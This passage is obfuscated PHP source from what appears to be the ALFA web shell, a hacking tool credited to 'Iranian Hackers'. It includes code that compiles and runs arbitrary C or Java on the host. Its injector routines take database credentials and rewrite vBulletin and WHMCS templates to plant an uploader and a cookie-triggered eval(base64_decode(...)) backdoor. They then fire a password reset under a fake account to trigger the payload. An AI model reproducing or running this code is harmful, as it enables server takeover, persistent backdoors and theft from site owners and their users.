1\x64\74\x2f\x66\157\156\164\x3e\x3c\x62\162\76\xd\12\74\x66\x6f\156\x74\x20\x63\157\154\x6f\x72\x3d\47\x23\106\x46\x30\60\60\60\x27\x3e\120\145\162\x73\x69\141\156\x20\x47\x75\x6c\x66\x20\106\x6f\x72\40\x45\166\145\x72\74\x2f\146\x6f\x6e\164\76\74\142\162\x3e\xd\xa\74\x66\x6f\x6e\164\40\x63\157\154\157\x72\x3d\x27\x23\x46\x46\60\60\60\x30\47\76\x49\162\x61\156\151\141\x6e\x20\x48\141\x63\x6b\x65\162\163\40\x3a\x29\x3c\57\146\157\156\164\x3e\74\x62\x72\76\15\12\x3c\x66\157\x6e\x74\40\x63\157\154\157\162\75\47\x23\x46\106\x30\x30\x30\x30\47\x3e\117\165\x72\40\x46\x72\x69\x65\156\144\163\40\x3a\40\115\162\x2e\120\x45\x52\123\111\x41\x20\x2c\x20\122\63\x76\145\x43\x30\x64\x65\162\x3c\57\x66\157\156\x74\x3e\x3c\x62\x72\x3e\15\12\x3c\57\143\145\156\164\x65\162\x3e\x3c\57\160\162\x65\76\x3c\151\146\x72\141\x6d\145\40\163\162\143\75\47\164\147\x3a\x2f\57\162\145\163\157\x6c\x76\x65\77\x64\157\x6d\x61\151\156\x3d\x73\x6f\x6c\145\166\x69\x73\151\x62\x6c\x65\x27\40\146\x72\141\x6d\x65\142\x6f\x72\x64\x65\162\x3d\x27\x30\x27\40\167\151\x64\x74\150\x3d\x27\x30\x27\40\x68\145\151\147\150\164\75\x27\60\x27\76\x3c\x2f\x69\x66\x72\141\x6d\x65\x3e"; } goto Ak_7y; r2Yem: alfahead(); goto Q_b8A; Q_b8A: echo "\74\x64\151\166\x20\143\154\141\163\163\x3d\x22\150\145\141\144\x65\162\x22\x3e\x3c\x63\x65\x6e\x74\x65\162\76\74\x70\x3e\x3c\x64\x69\166\40\x63\x6c\x61\163\x73\75\x22\164\170\164\x66\157\156\x74\137\x68\x65\x61\x64\x65\162\42\x3e\x7c\x20\x41\154\x66\x61\40\53\40\x7c\x3c\57\x64\151\166\x3e\74\57\160\76\x3c\x63\145\x6e\x74\x65\x72\x3e\x3c\x68\x33\76\x3c\x61\40\x68\x72\x65\x66\x3d\x6a\141\166\x61\163\x63\x72\x69\160\x74\72\166\x6f\x69\x64\50\60\x29\40\x6f\156\x63\154\x69\x63\153\75\42\147\x28\x27\x70\154\165\x73\47\x2c\x6e\x75\154\154\54\x27\x6e\145\x77\163\47\51\x3b\x22\x3e\x7c\40\116\x65\167\x73\x20\x7c\40\x3c\57\141\x3e\x3c\141\x20\150\162\x65\146\x3d\x6a\141\166\x61\163\x63\162\x69\x70\164\72\166\x6f\151\x64\50\60\51\40\x6f\156\x63\x6c\x69\143\x6b\75\42\147\50\x27\160\154\165\x73\x27\54\156\x75\154\x6c\54\x27\x74\x6f\157\x6c\163\x27\x29\42\x3e\174\x20\124\x6f\x6f\154\163\40\174\x20\x3c\57\x61\76\74\141\40\x68\x72\145\x66\x3d\152\x61\166\141\163\143\162\151\x70\x74\72\x76\157\151\144\x28\x30\x29\40\x6f\156\x63\x6c\151\x63\153\x3d\x22\147\x28\47\x70\154\x75\x73\47\x2c\156\165\x6c\154\54\x27\141\x62\157\x75\x74\x27\51\x22\76\174\x20\101\x62\157\165\x74\40\125\163\x20\174\40\x3c\x2f\141\x3e\74\x2f\150\x33\x3e\74\57\x63\x65\x6e\164\x65\x72\x3e"; goto p1Htw; Ak_7y: echo "\74\57\x64\x69\x76\76"; goto TbBml; NtrIZ: } goto Kt2cJ; X_eJR: function bcinit($evalType, $evalCode, $evalOptions, $evalArguments) { goto Sc4De; xTJsh: if ($evalArguments != '') { $evalArguments = "\x20" . $evalArguments; } goto jCtfZ; lqf_c: if ($evalOptions != '') { $evalOptions = $evalOptions . "\40"; } goto xTJsh; jCtfZ: if ($evalType == "\143") { goto XAzXi; JN2sR: if (is_writable($tmpdir)) { goto B6A1X; fuWq3: $path = $filename; goto wOKv0; B6A1X: $uniq = substr(md5(time()), 0, 8); goto L8QSY; L8QSY: $filename = $evalType . $uniq . "\56\143"; goto fuWq3; wOKv0: if (__write_file($path, $evalCode)) { goto qZdM5; m6200: $evalOptions = "\55\157\40" . $pathres . "\40" . $evalOptions; goto wZhEp; a8ajL: $pathres = $filename . $ext; goto m6200; qZdM5: $ext = $GLOBALS["\x73\171\163"] == "\167\151\x6e" ? "\56\145\170\x65" : "\56\x6f\x75\x74"; goto a8ajL; wZhEp: $cmd = "\x67\x63\x63\x20" . $evalOptions . $path; goto uQ40N; h3cKT: if (is_file($pathres)) { if (chmod($pathres, 0755)) { $cmd = $pathres . $evalArguments; alfaEx($cmd); } else { $res = $err; } unlink($pathres); } else { $res = $err; } goto PXVtH; uQ40N: alfaEx($cmd); goto h3cKT; PXVtH: unlink($path); goto WrDg6; WrDg6: } else { $res = $err; } goto yi1fR; yi1fR: } goto Dj69U; Dj69U: return $res; goto SZWpg; dzWxm: chdir($tmpdir); goto JN2sR; XAzXi: $tmpdir = ALFA_TEMPDIR; goto dzWxm; SZWpg: } elseif ($evalType == "\x6a\141\166\141") { goto IrZuL; IrZuL: $tmpdir = ALFA_TEMPDIR; goto NycTm; GZUMq: return $res; goto PhhqF; uHgfB: if (is_writable($tmpdir)) { goto GjB0D; dXpZa: if (__write_file($path, $evalCode)) { goto b_qSQ; R4nC6: alfaEx($cmd); goto Fu8P_; EobKH: unlink($path); goto kSFlY; b_qSQ: $cmd = "\x6a\141\x76\141\x63\40" . $evalOptions . $path; goto R4nC6; Fu8P_: $pathres = $filename . "\x2e\143\x6c\x61\x73\x73"; goto Swlec; Swlec: if (is_file($pathres)) { if (chmod($pathres, 0755)) { $cmd = "\152\141\x76\141\x20" . $filename . $evalArguments; alfaEx($cmd); } else { $res = $err; } unlink($pathres); } else { $res = $err; } goto EobKH; kSFlY: } else { $res = $err; } goto ObySz; SZdKZ: $path = $filename . "\x2e\152\x61\x76\141"; goto dXpZa; GjB0D: if (preg_match("\57\143\x6c\x61\163\163\x5c\x20\x28\x5b\136\173\135\x2b\x29\173\57\151", $evalCode, $r)) { $classname = trim($r[1]); $filename = $classname; } else { goto FSAOb; FSAOb: $uniq = substr(md5(time()), 0, 8); goto xQys9; xQys9: $filename = $evalType . $uniq; goto NyfNZ; NyfNZ: $evalCode = "\x63\154\x61\163\163\40" . $filename . "\40\173\x20" . $evalCode . "\40\175\40"; goto zCTjp; zCTjp: } goto SZdKZ; ObySz: } goto GZUMq; NycTm: chdir($tmpdir); goto uHgfB; PhhqF: } goto Uz2RH; Uz2RH: return false; goto TAJlo; KgpY9: $err = "\x3c\146\x6f\156\164\x20\143\157\x6c\x6f\x72\x3d\x27\162\145\x64\x27\76\x5b\40\106\x61\x69\x6c\145\x64\56\56\56\x21\x20\135\74\x2f\146\157\x6e\164\x3e"; goto lqf_c; Sc4De: $res = "\74\146\157\x6e\x74\x20\143\x6f\x6c\x6f\162\x3d\47\x67\x72\145\145\156\x27\x3e\x5b\40\x53\x75\143\143\x65\x73\163\x2e\x2e\x2e\x21\40\135\74\57\146\157\156\x74\x3e"; goto KgpY9; TAJlo: } goto UqiuZ; FNPc5: function alfaShellInjectors() { goto ICA1W; NyKW6: if (isset($_POST["\141\x6c\146\141\63"]) && $_POST["\x61\x6c\146\141\x33"] == "\x76\x62") { goto dPd7J; dPd7J: AlfaNum(1, 2, 7, 9, 10); goto pn53k; pn53k: echo __pre() . "\x3c\160\x3e\x3c\x64\x69\166\40\x63\x6c\x61\163\163\75\42\164\x78\164\x66\x6f\x6e\x74\137\x68\x65\x61\x64\145\x72\42\x3e\174\x20\166\142\165\x6c\154\x65\164\151\156\40\x7c\x3c\x2f\144\x69\166\76\74\x2f\x70\x3e\x3c\x70\x3e" . getConfigHtml("\x76\142") . "\x3c\x2f\160\x3e\74\146\x6f\162\x6d\x20\156\x61\x6d\x65\75\42\146\162\155\42\x20\155\145\x74\x68\x6f\144\x3d\x22\x50\117\x53\124\42\40\x6f\156\163\x75\x62\155\x69\x74\75\x22\x67\x28\x27\x53\150\145\x6c\x6c\111\x6e\x6a\145\143\164\x6f\162\x73\47\54\x6e\x75\x6c\154\54\x6e\x75\x6c\154\x2c\164\150\x69\163\x2e\154\157\56\166\141\154\x75\145\54\x27\x76\x62\47\x2c\x74\x68\x69\x73\56\165\x73\x65\x72\56\166\141\x6c\x75\x65\54\164\150\151\163\56\160\141\x73\x73\x2e\166\x61\x6c\x75\x65\x2c\164\x68\x69\x73\x2e\x74\141\142\x2e\x76\x61\x6c\x75\x65\x2c\164\150\x69\x73\x2e\144\142\56\166\x61\x6c\x75\145\x2c\x74\x68\151\x73\56\x6d\145\x74\x68\157\x64\x2e\166\141\154\x75\145\51\73\x20\x72\x65\x74\x75\162\x6e\x20\x66\141\154\163\145\x3b\x22\76"; goto QP6Fn; W9BAS: create_table($table); goto YPeuE; QP6Fn: $table = array("\x74\x64\x31" => array("\x63\157\x6c\x6f\162" => "\106\106\106\106\x46\106", "\164\144\116\141\155\x65" => "\x48\157\163\x74\40\72\40", "\151\x6e\160\x75\164\x4e\141\155\145" => "\x6c\x6f", "\x69\x64" => "\144\142\x5f\x68\157\163\164", "\151\156\x70\x75\x74\x56\x61\154\x75\145" => "\x6c\x6f\x63\141\154\x68\157\163\x74", "\151\156\x70\165\164\123\x69\172\x65" => "\65\x30"), "\164\144\x32" => array("\143\x6f\x6c\157\x72" => "\106\x46\106\106\x46\106", "\164\144\x4e\141\x6d\145" => "\x44\141\x74\141\x42\x61\x73\x65\40\116\x61\x6d\145\40\72\40", "\151\x6e\x70\165\164\x4e\141\x6d\x65" => "\x64\142", "\x69\x64" => "\x64\142\x5f\156\141\x6d\x65", "\x69\x6e\160\165\164\x56\x61\x6c\x75\x65" => '', "\x69\156\160\x75\164\123\x69\172\145" => "\x35\x30"), "\164\144\x33" => array("\143\157\154\x6f\162" => "\x46\106\x46\106\x46\106", "\164\x64\x4e\141\155\145" => "\x55\x73\145\162\40\x4e\x61\155\x65\x20\x3a\40", "\x69\x6e\160\165\164\116\x61\x6d\145" => "\x75\163\x65\x72", "\151\x64" => "\x64\x62\x5f\165\x73\145\162", "\x69\156\x70\165\x74\x56\141\154\165\x65" => '', "\x69\156\160\x75\x74\123\x69\172\145" => "\65\60"), "\164\x64\x34" => array("\x63\x6f\154\x6f\162" => "\x46\x46\x46\x46\106\106", "\164\144\x4e\141\x6d\x65" => "\x50\141\x73\x73\x77\x6f\162\144\40\72\x20", "\x69\x6e\160\165\x74\116\x61\x6d\x65" => "\x70\141\x73\x73", "\x69\144" => "\x64\x62\x5f\160\167", "\x69\156\160\165\164\x56\x61\x6c\x75\x65" => '', "\151\x6e\160\x75\164\x53\151\x7a\x65" => "\65\x30"), "\164\x64\x35" => array("\x63\157\x6c\157\x72" => "\106\x46\106\106\106\x46", "\x74\x64\x4e\141\155\x65" => "\x54\x61\142\x6c\145\40\x50\162\x65\146\151\170\x20\72\40", "\x69\x6e\160\x75\164\x4e\141\155\x65" => "\164\141\x62", "\151\x64" => "\144\x62\137\x70\162\145\x66\x69\170", "\151\156\160\x75\164\x56\141\154\x75\145" => '', "\151\156\160\x75\164\x53\x69\x7a\x65" => "\x35\x30")); goto W9BAS; Fa1db: if (isset($_POST["\141\x6c\x66\x61\x34"]) && !empty($_POST["\x61\x6c\x66\141\64"])) { goto BA2F4; VrVP5: $rec = "\x73\145\x6c\x65\x63\x74\x20\140\x74\x65\x6d\160\154\x61\x74\145\140\40\x66\162\157\155\40" . $_POST["\141\154\146\141\66"] . "\164\145\x6d\160\x6c\x61\x74\145\x20\x57\110\x45\x52\x45\40\x74\x69\x74\x6c\x65\40\75\x27\x66\x61\161\47"; goto DWkG3; dwYgC: $realpath = parse_url($saveval, PHP_URL_PATH); goto E5J1a; SFGl3: if ($res) { $ff = "\150\164\x74\x70\72\57\x2f" . $realurl . $realpath . "\57\x73\157\154\145\166\151\x73\x69\142\154\145\x2e\x70\x68\160"; output($ff); } else { goto h9gCz; czwCT: $fff = "\x68\x74\x74\x70\x3a\57\57" . $realurl . $realpath . "\57\x73\157\154\145\166\151\163\x69\x62\x6c\x65\56\160\150\160"; goto fFp7H; h9gCz: $ff = "\x68\164\x74\160\x3a\x2f\57" . $realurl . $realpath . "\57\x66\x61\x71\56\x70\x68\x70"; goto czwCT; fFp7H: echo "\74\143\145\156\164\145\162\x3e\74\160\x3e\x3c\x66\x6f\156\164\40\143\157\154\157\x72\x3d\x22\43\106\106\x46\x46\x46\x46\42\x3e\x46\x69\162\163\x74\x20\117\160\145\156\x20\x54\150\x69\x73\x20\x4c\151\x6e\153\40\x3d\76\40\x3c\57\146\157\156\x74\x3e\x3c\141\x20\150\162\145\146\75\x27" . $ff . "\x27\40\x74\141\x72\x67\x65\x74\x3d\47\137\x62\x6c\141\156\153\47\76" . $ff . "\x3c\57\x61\x3e\x3c\142\162\57\76\74\x66\x6f\156\x74\x20\143\x6f\x6c\157\x72\x3d\42\x23\x46\x46\106\x46\x46\x46\x22\x3e\x53\145\x63\x6f\x6e\144\x20\x4f\x70\145\156\x20\x54\x68\151\163\x20\x4c\151\156\x6b\40\x3d\76\x20\74\57\146\x6f\x6e\x74\76\x3c\x61\x20\150\x72\x65\x66\x3d\x27" . $fff . "\47\x20\164\x61\162\147\x65\164\75\47\x5f\142\x6c\x61\x6e\x6b\x27\x3e" . $fff . "\x3c\x2f\141\76\x3c\x2f\143\x65\x6e\164\x65\x72\76\74\57\160\76"; goto VtTFr; VtTFr: } goto vxPH1; BA2F4: $method = $_POST["\141\154\146\141\70"]; goto KvSh1; oXBjc: $conn = @mysqli_connect($_POST["\x61\x6c\146\141\x32"], $_POST["\141\154\146\x61\64"], $_POST["\x61\154\x66\x61\x35"], $_POST["\141\x6c\x66\x61\x37"]) or die(@mysqli_error($conn)); goto VrVP5; MxnB5: $getval = @mysqli_fetch_assoc($geturl); goto yUZA_; HrRjN: $ka = @mysqli_query($conn, $p) or die(mysqli_error($conn)); goto nFjf7; qp_A4: $AlfaCurl = new AlfaCURL(); goto PDL2V; nFjf7: $geturl = @mysqli_query($conn, "\x73\145\x6c\x65\x63\x74\40\140\166\141\154\165\x65\140\40\146\162\157\155\x20" . $_POST["\x61\x6c\x66\x61\66"] . "\163\145\164\164\151\156\x67\x20\127\x48\x45\122\105\x20\140\166\141\x72\156\x61\155\x65\140\x3d\x27\142\142\165\162\154\47"); goto MxnB5; tp2KM: $p = "\x55\120\x44\x41\x54\x45\40" . $_POST["\141\x6c\x66\141\66"] . "\x74\x65\155\160\x6c\x61\x74\145\x20\x53\x45\x54\x20\x60\164\145\155\x70\x6c\141\x74\x65\x60\x3d\x27" . $code . "\x27\x20\x57\x48\105\x52\105\40\140\164\151\x74\x6c\x65\140\75\x27\146\x61\161\x27"; goto HrRjN; Tk43Y: $code = str_replace("\47", "\x5c\x27", $code); goto tp2KM; KvSh1: $code = "\x7b\x24\x7b" . ALFA_UPLOADER . "\175\x7d\173\44\173\x65\x78\151\x74\50\51\175\x7d\x26"; goto oXBjc; PDL2V: if (extension_loaded("\x73\157\143\153\x65\x74\163") && function_exists("\x66\x73\x6f\143\x6b\157\x70\x65\156") && $method == "\x61\x75\164\157") { if ($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)) { goto DurBS; gfHhH: @fputs($fsock, "\x43\157\156\156\145\143\x74\x69\x6f\156\x3a\40\143\x6c\157\x73\145\xd\12\15\12"); goto NTB2x; Uofcb: @fputs($fsock, "\110\x4f\x53\124\x3a\40{$realurl}\15\12"); goto gfHhH; DurBS: @fputs($fsock, "\x47\x45\124\x20{$realpath}\57\x66\x61\161\x2e\x70\x68\160\x20\110\x54\x54\120\x2f\x31\x2e\x31\xd\xa"); goto Uofcb; Bjyqn: @fclose($fsock); goto mW7E8; XfFtu: if (preg_match("\57\62\x30\x30\40\x4f\113\x2f\151", $check)) { goto EHV9X; jE7RS: $res = true; goto VmwCm; zdv_y: $ka1 = @mysqli_query($conn, $p1) or die(mysqli_error($conn)); goto jE7RS; EHV9X: $p1 = "\125\120\104\101\124\x45\40" . $_POST["\141\x6c\146\x61\66"] . "\x74\145\155\160\x6c\141\164\x65\x20\x53\105\x54\x20\164\145\x6d\160\154\141\x74\145\x20\x3d\x27" . str_replace("\x27", "\x5c\47", $savetoass) . "\47\40\127\x48\105\x52\105\40\164\151\x74\154\x65\40\x3d\47\x66\x61\x71\47"; goto zdv_y; VmwCm: } goto Bjyqn; NTB2x: $check = fgets($fsock); goto XfFtu; mW7E8: } } elseif (function_exists("\x63\165\162\x6c\x5f\x76\x65\x72\x73\x69\x6f\156") && $method == "\141\x75\x74\x6f") { goto HssIh; bww1q: $res = true; goto YWkCO; HssIh: $AlfaCurl->Send($realurl . $realpath . "\57\x66\141\x71\x2e\160\x68\160"); goto Otliy; Otliy: $p1 = "\x55\x50\x44\x41\124\x45\x20" . $_POST["\x61\x6c\x66\x61\66"] . "\164\145\155\160\154\x61\164\145\x20\123\x45\124\x20\x74\x65\x6d\x70\x6c\141\164\x65\x20\75\47" . str_replace("\47", "\x5c\x27", $savetoass) . "\47\40\x57\110\105\122\x45\x20\164\x69\164\x6c\145\x20\75\x27\x66\x61\161\x27"; goto hZ1z4; hZ1z4: $ka1 = @mysqli_query($conn, $p1) or die(mysqli_error($conn)); goto bww1q; YWkCO: } goto SFGl3; guSlC: $savetoass = $getd["\x74\x65\155\160\x6c\x61\x74\x65"]; goto Tk43Y; LmxYU: $realurl = parse_url($saveval, PHP_URL_HOST); goto dwYgC; DWkG3: $recivedata = @mysqli_query($conn, $rec); goto LTHJX; E5J1a: $res = false; goto qp_A4; yUZA_: $saveval = $getval["\166\141\x6c\x75\145"]; goto LmxYU; LTHJX: $getd = @mysqli_fetch_assoc($recivedata); goto guSlC; vxPH1: } goto Y3ZuC; YPeuE: echo $selector; goto oaHss; oaHss: echo "\x3c\x70\76\74\151\156\x70\x75\x74\x20\164\x79\x70\145\75\x22\x73\x75\x62\155\151\x74\42\x20\166\x61\x6c\x75\145\75\42\x20\x22\x20\57\76\74\57\160\x3e\x3c\x2f\146\x6f\162\x6d\76\x3c\x2f\143\x65\156\164\145\x72\76"; goto Fa1db; Y3ZuC: } goto BU8np; BU8np: echo "\74\x2f\x64\x69\x76\x3e"; goto OUB70; BV_ep: echo "\x3c\x64\x69\166\x20\x63\154\x61\x73\163\x3d\x68\145\x61\x64\145\x72\76"; goto FpYT6; wqwMm: if (isset($_POST["\x61\x6c\146\x61\61"]) && $_POST["\x61\x6c\x66\x61\x31"] == "\x77\x68\155\143\163") { goto zjzkq; zhTpe: echo "\74\160\x3e\x3c\151\156\x70\165\x74\40\x74\x79\x70\x65\x3d\x27\x73\x75\142\x6d\151\x74\47\40\166\141\154\x75\145\75\47\x20\47\76\74\x2f\160\76\x3c\57\x66\157\162\x6d\x3e\74\x2f\x63\x65\x6e\164\145\162\x3e\x3c\x2f\164\x64\76\x3c\57\164\x72\76\x3c\57\164\x61\142\x6c\145\x3e\74\x2f\143\145\156\164\x65\162\x3e"; goto GVAwK; zjzkq: AlfaNum(); goto z8E5_; UKZ2h: echo $selector; goto zhTpe; GVAwK: if (isset($_POST["\x61\x6c\146\x61\x36"])) { goto x0ai8; HIhAF: $index = "\173\160\150\160\x7d" . ALFA_UPLOADER . "\x3b\173\x2f\160\150\x70\175"; goto zX_zs; x0ai8: $dbu = $_POST["\x61\x6c\x66\x61\x36"]; goto T1ivw; zX_zs: $newin = str_replace("\47", "\134\x27", $index); goto id3LB; T1ivw: $dbn = $_POST["\x61\x6c\146\x61\67"]; goto qJ3nQ; goHAn: if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index)) { if (filter_var($path, FILTER_VALIDATE_URL)) { goto a_FIU; AAhj2: $soleSave = mysqli_query($conn, "\163\145\154\x65\x63\x74\40\155\x65\x73\163\141\x67\x65\40\x66\x72\157\155\x20\164\x62\154\x65\155\x61\151\154\164\x65\x6d\160\x6c\x61\164\145\163\40\167\150\x65\162\145\x20\156\141\155\x65\x3d\47\x50\141\x73\x73\167\x6f\162\144\x20\122\x65\x73\x65\x74\40\x56\x61\154\x69\x64\x61\x74\151\x6f\x6e\x27"); goto cwDih; JpcOy: $tempSave = str_replace("\47", "\134\x27", $tempSave1); goto TjMP_; tsgR4: $result2 = mysqli_query($conn, $create) or die(mysqli_error($conn)); goto tbTE3; a_FIU: $conn = mysqli_connect($dbh, $dbu, $dbp, $dbn) or die(mysqli_error($conn)); goto AAhj2; x_Sq0: $create = "\151\x6e\x73\145\x72\x74\40\x69\x6e\164\x6f\40\164\142\154\x63\x6c\x69\145\156\x74\x73\x20\50\x65\155\x61\151\x6c\51\x20\x76\141\x6c\x75\x65\163\50\x27\163\x6f\x6c\x65\x76\151\163\x69\x62\x6c\145\100\x66\x62\x69\x2e\x67\x6f\x76\x27\x29"; goto tsgR4; IsUix: $tempSave1 = $soleGet["\x6d\x65\163\163\x61\147\145"]; goto JpcOy; tbTE3: if (function_exists("\x63\x75\x72\x6c\x5f\166\x65\162\163\151\x6f\156") && $method == "\141\x75\164\157") { goto kmREu; PN0I5: $AlfaSole->Send($path . "\57\x70\x77\162\145\163\x65\164\56\x70\x68\x70", "\x70\x6f\x73\164", "\x74\x6f\x6b\x65\156\75{$token[1]}\46\141\143\x74\x69\x6f\x6e\75\x72\x65\163\x65\164\46\145\x6d\141\x69\x6c\x3d\163\157\x6c\145\166\151\x73\x69\x62\154\145\x40\146\x62\x69\x2e\147\x6f\166"); goto rrA5n; G3awu: $ff = "\x68\164\x74\x70\72\x2f\57" . $path . "\57\163\x6f\154\145\166\151\163\151\142\x6c\145\56\x70\x68\x70"; goto OHnCG; cvixk: $getToken = preg_match("\x2f\156\x61\155\x65\x3d\x22\164\157\x6b\145\x6e\x22\x20\x76\x61\x6c\165\145\75\x22\x28\56\52\77\51\42\x2f\151", $saveurl, $token); goto PN0I5; q64Sm: $saveurl = $AlfaSole->Send($path . "\x2f\160\167\x72\x65\x73\145\164\56\x70\150\x70"); goto cvixk; ZV1Go: __alert("\163\x68\x65\x6c\154\40\151\156\152\x65\143\x74\145\164\x2e\x2e\x2e"); goto G3awu; rrA5n: $backdata = "\125\x50\104\101\124\105\x20\x74\x62\154\145\155\141\151\154\164\x65\x6d\160\x6c\141\164\145\163\40\x53\105\x54\x20\x6d\x65\163\163\x61\x67\145\75\47{$tempSave}\x27\40\x57\x48\x45\x52\x45\x20\x6e\141\x6d\x65\75\47\x50\141\163\163\167\x6f\162\x64\x20\122\x65\163\145\164\x20\126\x61\x6c\x69\x64\141\x74\151\x6f\x6e\47"; goto iWKON; iWKON: $Solevisible = mysqli_query($conn, $backdata) or die(mysqli_error($conn)); goto ZV1Go; kmREu: $AlfaSole = new AlfaCURL(true); goto q64Sm; OHnCG: output($ff); goto c9VjN; c9VjN: } else { echo "\74\x62\162\76\x3c\160\162\x65\x20\151\144\75\x22\163\164\162\x4f\x75\x74\160\165\x74\42\40\x73\x74\171\154\x65\x3d\42\x6d\141\x72\x67\x69\x6e\x2d\164\x6f\160\72\x35\x70\170\x22\40\x63\154\141\x73\x73\75\42\155\x6c\x31\42\x3e\74\x62\x72\76\x3c\x63\x65\156\x74\x65\162\x3e\74\x62\x3e\74\x66\x6f\156\x74\x20\143\x6f\x6c\x6f\x72\x3d\x22\x23\106\106\106\106\x46\106\42\76\x50\154\145\141\163\x65\x20\147\x6f\x20\164\157\x20\x54\141\x72\x67\145\164\40\x3d\76\40\x3c\57\146\157\156\x74\76\74\141\40\x68\162\145\146\x3d\47" . $path . "\x2f\x70\x77\x72\145\x73\x65\x74\x2e\160\x68\x70\x27\x20\164\x61\x72\x67\x65\x74\x3d\x27\137\142\154\141\x6e\153\47\x3e" . $path . "\57\160\x77\x72\145\163\x65\164\56\x70\150\x70\x3c\x2f\x61\76\x3c\x62\162\57\x3e\74\x66\x6f\x6e\x74\40\x63\157\154\157\162\75\47\x23\x46\x46\x46\x46\x46\106\x27\x3e\x20\101\156\x64\40\x52\x65\163\145\164\x20\120\x61\x73\x73\x77\x6f\162\x64\40\127\151\x74\x68\40\105\155\x61\x69\x6c\x3c\57\146\x6f\x6e\164\76\40\75\76\x20\74\146\157\x6e\x74\x20\143\157\154\157\x72\75\162\145\x64\x3e\x73\157\154\145\x76\151\x73\x69\x62\154\145\100\x66\142\x69\56\147\x6f\166\x3c\x2f\146\x6f\156\x74\76\x3c\x62\162\57\76\74\146\x6f\x6e\x74\x20\x63\x6f\x6c\x6f\162\x3d\x27\43\106\106\106\x46\106\x46\47\76\x41\x6e\144\x20\x47\157\x20\x54\x6f\40\x3d\76\40\74\57\x66\157\x6e\x74\x3e\x3c\x61\x20\150\162\145\146\x3d\x27" . $path . "\x2f\x73\x6f\x6c\x65\166\151\x73\151\142\x6c\x65\x2e\160\150\x70\x27\40\164\141\x72\147\x65\164\x3d\47\x5f\142\154\141\156\153\x27\x3e" . $path . "\57\163\157\154\145\166\x69\163\151\142\x6c\145\x2e\x70\x68\x70\x3c\x2f\141\x3e\74\x2f\142\76\x3c\x2f\x63\x65\156\x74\145\162\76\74\x62\162\76\x3c\x62\162\76"; } goto blIri; cwDih: $soleGet = mysqli_fetch_assoc($soleSave); goto IsUix; ejy58: $result = mysqli_query($conn, $inject) or die(mysqli_error($conn)); goto x_Sq0; TjMP_: $inject = "\x55\120\x44\101\124\x45\40\x74\142\x6c\145\x6d\x61\151\154\164\x65\x6d\160\x6c\141\164\x65\x73\x20\123\x45\124\40\x6d\145\163\163\x61\147\x65\75\47{$newindex}\47\x20\x57\110\x45\122\x45\40\x6e\x61\x6d\x65\75\47\x50\x61\163\163\167\x6f\x72\144\x20\x52\145\163\145\164\40\126\141\154\x69\144\x61\164\151\x6f\x6e\x27"; goto ejy58; blIri: } else { __alert("\120\141\164\150\x20\x69\x73\40\x6e\157\x74\40\126\141\154\x69\x64\x2e\56\56"); } } goto viKj9; j1qZ5: $dbh = $_POST["\x61\154\146\141\x39"]; goto iTKQ3; id3LB: $newindex = "\74\x70\x3e\104\145\141\162\40{$newin}\54\x3c\57\160\76\x3c\160\x3e\x52\145\143\x65\x6e\x74\x6c\x79\40\x61\x20\x72\x65\x71\165\145\163\x74\x20\167\141\163\40\163\165\x62\155\151\164\x74\x65\x64\x20\164\x6f\x20\x72\145\163\x65\x74\40\171\157\x75\x72\40\x70\141\163\x73\x77\x6f\x72\x64\40\146\x6f\x72\x20\x6f\x75\x72\x20\143\154\x69\145\156\x74\x20\141\162\145\141\x2e\40\111\x66\x20\171\x6f\x75\40\144\151\144\x20\156\x6f\x74\x20\x72\x65\161\x75\145\x73\164\40\x74\150\151\x73\x2c\x20\x70\154\145\141\163\145\40\x69\147\x6e\157\x72\145\x20\x74\x68\151\163\40\x65\x6d\x61\151\154\x2e\40\111\164\x20\167\151\154\x6c\40\145\x78\x70\x69\162\x65\x20\x61\156\144\40\142\145\x63\x6f\x6d\x65\40\x75\163\145\154\145\163\163\40\x69\156\40\62\40\150\x6f\x75\162\x73\x20\164\x69\x6d\x65\56\x3c\57\160\76\x3c\x70\76\124\x6f\x20\162\145\x73\145\164\40\171\x6f\x75\162\x20\x70\x61\163\x73\x77\157\162\144\54\40\160\154\x65\x61\163\x65\40\x76\x69\163\x69\x74\40\164\150\145\40\165\x72\154\40\142\x65\x6c\x6f\167\x3a\x3c\142\162\40\x2f\x3e\74\141\x20\150\162\145\146\75\x22\x7b\x24\x70\x77\137\162\145\x73\x65\164\x5f\x75\x72\x6c\175\42\x3e\173\x24\160\167\x5f\x72\x65\x73\145\x74\x5f\x75\162\154\x7d\74\x2f\141\76\74\x2f\x70\x3e\74\160\76\x57\x68\145\156\x20\x79\157\x75\x20\x76\x69\163\151\164\x20\x74\150\x65\x20\154\x69\x6e\153\40\141\142\157\166\145\x2c\40\x79\x6f\165\x72\x20\160\141\163\x73\x77\x6f\162\x64\40\167\151\154\x6c\40\142\x65\x20\162\x65\x73\x65\x74\x2c\40\x61\x6e\144\x20\x74\150\x65\40\156\145\167\x20\x70\x61\x73\163\167\x6f\x72\144\40\167\x69\154\x6c\x20\142\x65\x20\x65\x6d\141\x69\154\x65\144\x20\164\157\x20\171\x6f\x75\56\74\57\160\x3e\x3c\160\76\173\x24\x73\151\147\x6e\x61\164\165\x72\145\x7d\74\x2f\x70\x3e\173\x70\x68\160\x7d\x69\x66\50\44\137\x43\x4f\x4f\113\111\x45\133\42\x73\x65\143\x22\x5d\x20\75\75\x20\x22\61\x32\x33\42\x29\x7b\145\x76\141\154\50\x62\x61\x73\145\66\x34\x5f\x64\x65\x63\157\144\x65\50\44\x5f\103\117\117\113\x49\105\133\x22\x73\145\143\62\x22\135\x29\51\73\40\x64\151\145\x28\x22\x21\42\51\73\175\173\x5c\x2f\x70\x68\160\x7d"; goto goHAn; iTKQ3: $path = $_POST["\x61\x6c\x66\x61\61\x30"]; goto R76WF; qJ3nQ: $dbp = $_POST["\141\x6c\x66\x61\70"]; goto j1qZ5; R76WF: $method = $_POST["\141\x6c\146\141\64"]; goto HIhAF; viKj9: } goto i5QMN; OWsj3: create_table($table); goto UKZ2h; z8E5_: echo __pre() . "\74\160\76\x3c\144\x69\x76\x20\143\154\x61\x73\163\75\47\x74\170\164\146\x6f\x6e\164\x5f\150\145\x61\144\x65\x72\x27\x3e\174\40\x57\110\x4d\x43\123\40\x7c\x3c\57\x64\151\166\x3e\74\x2f\160\x3e\74\x63\145\x6e\164\145\162\76\74\143\x65\156\164\145\162\x3e\74\160\x3e" . getConfigHtml("\x77\x68\x6d\143\x73") . 